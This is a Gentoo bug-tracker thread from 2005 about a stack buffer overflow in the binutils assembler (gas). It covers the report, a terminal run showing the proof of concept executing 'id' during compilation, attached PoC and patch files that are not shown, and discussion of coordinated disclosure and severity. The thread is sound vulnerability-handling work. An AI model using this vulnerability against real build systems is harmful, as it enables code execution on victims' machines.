Bug 99464 - sys-devel/binutils: buffer overflow in gas
Summary: sys-devel/binutils: buffer overflow in gas
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: Current packages
Hardware: All Linux
Importance: High minor
Assignee: Gentoo Toolchain Maintainers
Reported: 2005-07-18 14:33 UTC by Tavis Ormandy (RETIRED)
Modified: 2005-09-26 17:11 UTC
Attachments
PoC (gas-poc.sh, 608 bytes, text/plain) 2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)
patch (gas-messages-bof.diff, 1.98 KB, patch) 2005-07-18 14:34 UTC, Tavis Ormandy (RETIRED)

Comment 1 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:33:57 UTC
Stack buffer overflow in gas, perhaps exploitable via distcc or by tricking users
into compiling/assembling code.

$ gas-poc.sh > foo.c
$ gcc foo.c
/tmp/cc4hRCFg.s: Assembler messages:
/tmp/cc4hRCFg.s:13: Error: no such instruction: 
uid=1000(taviso) gid=100(users) groups=5(tty),6(disk),10(wheel),16(cron),
19(cdrom),35(games),100(users),250(portage),407(mp3),408(mame)
/usr/lib/gcc-lib/i686-pc-linux-gnu/3.3.5-20050130/../../../crt1.o(.text+0x18): 
In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status

PoC attached, tested with sys-devel/binutils-2.15.92.0.2-r10, along with a patch that
fixes this issue for me.
Comment 2 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:34:20 UTC
Created attachment 63735
PoC
Comment 3 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-18 14:34:33 UTC
Created attachment 63736
patch
Comment 4 SpanKY gentoo-dev 2005-07-18 21:30:12 UTC
How exactly are we to proceed with this? The patch definitely looks good, but is
someone going to contact vuln-sec, or should I just post the patch to the
binutils mailing list (at which point keeping this bug closed is pointless)?
Comment 5 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-07-18 22:08:36 UTC
The plan is like this:  
1. Tigger/SpanKY/Solar please confirm  
2. Taviso please mail vendor-sec 
3. Arch security liaisons test 
4. Coordinated disclosure 
Comment 6 rob holland (RETIRED) gentoo-dev 2005-07-19 01:51:50 UTC
confirmed as stack overflow.

as: stack smashing attack in function as_bad()
Comment 7 SpanKY gentoo-dev 2005-07-19 06:02:24 UTC
Erm, I don't think the binutils guys are on the vendor-sec list? I could
e-mail a handful of the big devs...
Comment 8 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-07-19 06:29:58 UTC
Vapier please do. (2a. Contact upstream) 
Comment 9 SpanKY gentoo-dev 2005-07-20 15:24:30 UTC
The binutils project does not wish to handle any overflow/etc. issues in a
private manner.

E-mailed the upstream dev list, and it should be in shortly.
Comment 10 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-07-20 22:17:30 UTC
Toolchain please provide an updated ebuild. 
Comment 11 SpanKY gentoo-dev 2005-07-21 14:56:42 UTC
Well, there are plenty of other overflow/sanity-check patches which have been added to binutils, but I've opted not to add them to our ebuild... As upstream says, they'd rather not treat overflows in binutils as regular vulnerabilities, so issuing a GLSA for this seems a bit overdone... Also, they've accepted and committed the patch Taviso posted.
Comment 12 Tavis Ormandy (RETIRED) gentoo-dev 2005-07-21 23:19:15 UTC
Agreed, not GLSA worthy (you'd have to trick someone into compiling your source
code; it doesn't seem too much of a leap to get them to execute it afterwards).

Do you think it's worth adding the patch to our package Spanky? 
Comment 13 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-07-21 23:30:05 UTC
Rerating as B2. 
Comment 14 SpanKY gentoo-dev 2005-07-22 10:34:23 UTC
Not really... If I do this one, then I should go through all the other BFD
fixes that have been posted to the binutils mailing list in the last few months
since the 1.16.1 release...
Comment 15 Thierry Carrez (RETIRED) gentoo-dev 2005-07-30 06:39:58 UTC
Even if we did some GLSAs in the past that required heavy social engineering
(read: dumb user) to work, I don't think we should continue on that trend. I
propose to downgrade this to simple bug status.

Security: please give your opinion.
Comment 16 Sune Kloppenborg Jeppesen (RETIRED) gentoo-dev 2005-07-31 12:59:42 UTC
I agree. Reassigning to toolchain, keeping security on cc. 
Comment 17 SpanKY gentoo-dev 2005-09-26 17:11:26 UTC
should be all set now